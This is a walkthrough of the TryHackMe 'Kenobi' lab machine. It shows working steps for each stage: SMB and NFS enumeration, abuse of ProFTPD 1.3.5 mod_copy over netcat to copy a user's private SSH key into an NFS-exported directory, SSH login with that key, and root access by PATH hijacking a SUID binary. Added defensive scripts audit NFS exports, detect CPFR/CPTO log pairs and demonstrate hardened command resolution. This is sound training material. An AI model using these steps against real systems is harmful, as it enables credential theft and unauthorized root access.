Kenobi TryHackMe Walkthrough
Challenge Link: https://tryhackme.com/room/kenobi
Scanning
First, we scan the target with nmap: a port scan with service and version detection (-sV) and the default scripts (-sC), saving the output to a file.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -sC -sV -oN nmap/initial 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 18:34 IST
Nmap scan report for 10.10.209.89
Host is up (0.17s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 38636/udp6 mountd
| 100005 1,2,3 42497/udp mountd
| 100005 1,2,3 48661/tcp6 mountd
| 100005 1,2,3 51959/tcp mountd
| 100021 1,3,4 39973/tcp nlockmgr
| 100021 1,3,4 40817/udp nlockmgr
| 100021 1,3,4 43839/tcp6 nlockmgr
| 100021 1,3,4 47091/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Several ports are open: FTP (ProFTPD 1.3.5) on port 21, SSH on port 22, an Apache HTTP web server on port 80, rpcbind on port 111 with NFS on port 2049, and SMB on ports 139 and 445.
Initial Enumeration
We start by enumerating the SMB service. To list the available shares, we run smbclient with -L and the IP address of the machine, leaving the password blank (a null session).
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient -L 10.10.209.89
Enter WORKGROUP\madhav's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
There is an SMB share named anonymous. Connecting to it reveals a file named log.txt, which we download with the commands shown below.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient //10.10.209.89/anonymous
Enter WORKGROUP\madhav's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Wed Sep 4 16:26:07 2019
log.txt N 12237 Wed Sep 4 16:19:09 2019
9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (17.4 KiloBytes/sec) (average 17.4 KiloBytes/sec)
smb: \> exit
log.txt contains the configuration of several services installed on the system. From it we learn that there is a user named kenobi whose private SSH key is stored in the /home/kenobi/.ssh folder.
There is also an NFS server. Running nmap with the NFS scripts shows that the /var directory is exported to every host (*), so we can mount it from our machine.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 19:43 IST
Nmap scan report for 10.10.209.89
Host is up (0.18s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
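The nfs-showmount output above is the attacker's view of an overly broad export. The same condition can be caught on the server side by auditing /etc/exports. The following script is an added example for this walkthrough, not part of the original post or the room: it parses /etc/exports syntax ("<path> <client>(opt,opt) ...") and flags wildcard clients, which let any host mount the share, and the no_root_squash option, which lets a remote root keep uid 0 on the exported tree. The file contents are constructed; only the /var line mirrors what the scan reported.

```python
"""Flag NFS exports that any host can mount (added example, constructed input)."""
import re

# Constructed sample /etc/exports (not copied from the target machine).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed example)
/var *(rw,sync)
/srv/backup 10.10.0.0/16(ro,sync,root_squash)
/export/home 10.10.5.20(rw,sync,no_root_squash) 10.10.5.21(rw,sync)
"""

# One client spec: a host/network token optionally followed by (opt,opt,...).
_CLIENT_RE = re.compile(r"(\S+?)(?:\(([^)]*)\))?(?=\s|$)")


def parse_exports(text):
    """Return (path, client, [options]) for every client of every export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split(None, 1)
        if len(fields) < 2:                   # a path with no clients exports nothing
            continue
        path, clients = fields
        for client, opts in _CLIENT_RE.findall(clients):
            options = [o.strip() for o in opts.split(",") if o.strip()]
            entries.append((path, client, options))
    return entries


def audit_exports(text):
    """Return (path, client, reason) for each risky export entry.

    "wildcard": any host may mount the share (the condition on this box).
    "no_root_squash": a remote root user is not mapped to nobody on the share.
    """
    findings = []
    for path, client, options in parse_exports(text):
        if client == "*":
            findings.append((path, client, "wildcard"))
        if "no_root_squash" in options:
            findings.append((path, client, "no_root_squash"))
    return findings


if __name__ == "__main__":
    for path, client, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {reason}")
```

On the target, the /var export to * is what later turns a file copy inside the server into a file read from the attacker's machine; restricting the client list to the hosts that need the share removes that step.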
Gaining Access
Next we move our enumeration to FTP. ProFTPD 1.3.5 is running on port 21, but we have no credentials and anonymous login is not enabled, so we cannot log in to the server.
Searching Exploit-DB for ProFTPD 1.3.5 returns a few exploits. Among them is a File Copy exploit (mod_copy) which allows us to copy files on the server via FTP.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
To exploit the service, we connect to FTP and use the SITE CPFR and SITE CPTO commands to copy /home/kenobi/.ssh/id_rsa to /var/tmp, which lies under the /var directory we can mount over NFS.
So let's connect to the FTP service using netcat and then copy the private SSH key.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nc 10.10.209.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.209.89]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
The exploit worked; now we can mount the /var directory on our Kali machine.
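The copy above never involved a login: the CPFR/CPTO pair was accepted on a fresh connection. That is also what makes it easy to spot in the server's command log. The following detector is an added example for this walkthrough, not part of the original post. It assumes an ExtendedLog written with the ProFTPD LogFormat '%a %u %t "%r" %s' (client IP, user, timestamp, full command, response code) and that a session which has not sent USER is logged with the user "-"; the log lines are constructed to reproduce the copy performed above next to ordinary traffic.

```python
"""Spot mod_copy abuse (SITE CPFR followed by SITE CPTO) in ProFTPD command logs.

Added example, constructed log lines; the log format is an assumption, see lead-in.
"""
import re

SAMPLE_LOG = """\
10.10.14.5 - [06/Dec/2021:14:05:10 +0000] "SITE CPFR /home/kenobi/.ssh/id_rsa" 350
10.10.14.5 - [06/Dec/2021:14:05:12 +0000] "SITE CPTO /var/tmp/id_rsa" 250
10.10.14.9 alice [06/Dec/2021:14:07:00 +0000] "USER alice" 331
10.10.14.9 alice [06/Dec/2021:14:07:01 +0000] "PASS (hidden)" 230
10.10.14.9 alice [06/Dec/2021:14:07:05 +0000] "RETR report.pdf" 226
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<cmd>[^"]*)" (?P<code>\d{3})$'
)

# Source paths whose copy is almost always someone reading secrets.
SENSITIVE_SRC = [
    re.compile(r"^/home/[^/]+/\.ssh/"),
    re.compile(r"^/root/"),
    re.compile(r"^/etc/(shadow|sudoers)"),
]
# Destinations readable by other means on this box: the NFS export of /var
# and world-readable temp directories.
EXPOSED_DST = ("/var/", "/tmp/")


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect_mod_copy(lines):
    """Return one finding per completed CPFR -> CPTO pair, tracked per client IP."""
    pending = {}      # client IP -> source path from its last accepted CPFR
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["cmd"].split(maxsplit=2)
        if len(parts) != 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        if sub == "CPFR" and rec["code"] == "350":
            pending[rec["ip"]] = arg
        elif sub == "CPTO" and rec["code"] == "250":
            src = pending.pop(rec["ip"], None)
            findings.append({
                "ip": rec["ip"],
                "src": src,
                "dst": arg,
                "unauthenticated": rec["user"] == "-",
                "sensitive_source": src is not None and any(p.match(src) for p in SENSITIVE_SRC),
                "exposed_destination": arg.startswith(EXPOSED_DST),
            })
    return findings


if __name__ == "__main__":
    for f in detect_mod_copy(SAMPLE_LOG.splitlines()):
        print(f)
```

A CPFR/CPTO pair from a session that never authenticated is the strongest signal; the sensitive-source and exposed-destination flags are there to rank it. The fix on the server is to stop loading mod_copy on this version (or run a ProFTPD release where the commands require a logged-in user), which removes the primitive rather than just logging it.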
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ mkdir /tmp/kenobiNFS
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ sudo mount 10.10.209.89:/var /tmp/kenobiNFS
Now we copy id_rsa out of the /tmp/kenobiNFS mount, restrict its permissions, and log in as user kenobi via SSH.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ cp /tmp/kenobiNFS/tmp/id_rsa .
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ chmod 600 id_rsa
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ ssh -i id_rsa kenobi@10.10.209.89
The authenticity of host '10.10.209.89 (10.10.209.89)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.209.89' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:~$
We can now read the user flag present in the home directory of user kenobi.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
REDACTED
Privilege Escalation
Now that we have a shell on the system as user kenobi, we need to escalate our privileges to root. A first step is to look for SUID binaries with the following command:
find / -type f -perm -u=s 2>/dev/null
The binary /usr/bin/menu has the SUID bit set. When we run it, it prints a menu that can be used to perform different actions.
The binary passes these commands directly to the shell, which we can confirm with the strings command.
To exploit this, we create our own ifconfig that launches a shell and prepend its directory to PATH, so that when the SUID binary runs ifconfig by name, our version is executed instead. This technique is called PATH variable manipulation.
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > ifconfig
kenobi@kenobi:/tmp$ chmod 777 ifconfig
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
Hurray, we are root! Now we can read the root flag in the /root directory.
root@kenobi:/tmp# cd /root/
root@kenobi:/root# ls
root.txt
root@kenobi:/root# cat root.txt
REDACTED
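Two things made the escalation above possible: the SUID binary named ifconfig without a path, and the shell resolved that name through a PATH the unprivileged user controlled. The script below is an added example for this walkthrough, not the menu binary's own code. It reproduces the lookup in a throwaway world-writable directory, shows a hardened resolver that only trusts root-owned, non-writable directories, and automates the strings check from the text with a small heuristic (the _COMMON_TOOLS list and the byte blob it scans are constructed assumptions, not the real binary).

```python
"""PATH lookup as the shell does it, beside a hardened lookup, plus a strings-style audit.

Added example; the command list and the sample binary bytes are constructed.
"""
import os
import re
import shutil
import stat
import tempfile

TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"   # what a SUID program should search


def resolve_as_shell(cmd, path):
    """First executable named `cmd` along `path`, as system("ifconfig") would pick."""
    return shutil.which(cmd, path=path)


def dir_is_trusted(directory):
    """Trust a directory only if it is root-owned and not writable by group or others."""
    try:
        st = os.stat(directory)
    except OSError:
        return False
    return st.st_uid == 0 and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def resolve_hardened(cmd, path=TRUSTED_PATH):
    """Like resolve_as_shell, but skip every directory that fails dir_is_trusted."""
    for d in path.split(os.pathsep):
        if not dir_is_trusted(d):
            continue
        candidate = os.path.join(d, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def demo_hijack():
    """Recreate the PATH manipulation from the text and report what each resolver picked."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o1777)                 # sticky and world-writable, like /tmp
        fake = os.path.join(tmp, "ifconfig")  # stand-in for the attacker's ifconfig
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho hijacked\n")
        os.chmod(fake, 0o755)
        hijacked_path = tmp + os.pathsep + TRUSTED_PATH   # export PATH=/tmp:$PATH
        return {
            "naive_picked_fake": resolve_as_shell("ifconfig", hijacked_path) == fake,
            "hardened_picked_fake": resolve_hardened("ifconfig", hijacked_path) == fake,
        }


# --- the strings(1) check from the text, automated --------------------------
_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# Heuristic allowlist of tool names worth flagging when used without a path (assumption).
_COMMON_TOOLS = {"ifconfig", "uname", "curl", "cat", "ls", "id", "sh", "bash", "netstat", "ps"}


def relative_commands(blob):
    """Printable strings in `blob` that look like commands invoked without an absolute path."""
    hits = []
    for run in _PRINTABLE_RUN.findall(blob):
        tokens = run.decode("ascii").split()
        if not tokens:
            continue
        if "/" not in tokens[0] and tokens[0] in _COMMON_TOOLS:
            hits.append(" ".join(tokens))
    return hits


if __name__ == "__main__":
    print(demo_hijack())
    sample = b"\x7fELF\x00status check\x00curl -I localhost\x00uname -r\x00ifconfig\x00/usr/bin/id\x00"
    print(relative_commands(sample))   # constructed bytes standing in for a SUID binary
```

For a real SUID program the same two rules apply: invoke helpers by absolute path (or set PATH to a fixed trusted value before calling system()), and run relative_commands over the output of the find command from the text to catch binaries that do not.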
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Letixmix.